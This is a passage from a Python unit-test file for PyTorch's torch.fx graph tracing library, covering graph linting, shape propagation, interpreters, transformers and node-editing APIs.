g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
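# ShapeProp runs the traced module on the sample input and records shape/stride metadata in
# each node's meta['tensor_meta'], which the assertions in this test read back.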
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
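# Interpreter.run accepts an initial_env mapping Nodes to precomputed values; nodes already in
# the env are skipped rather than re-executed, which is what enables the partial evaluation below.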
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
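# Build a call chain deeper than Python's recursion limit; deepcopy of the Graph should still
# succeed, and the user/use relationships should be preserved in the copy.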
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
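# Graph.inserting_before(b) temporarily moves the insertion point, so the call_function node
# created inside the `with` block is placed before `b` in the node order.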
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
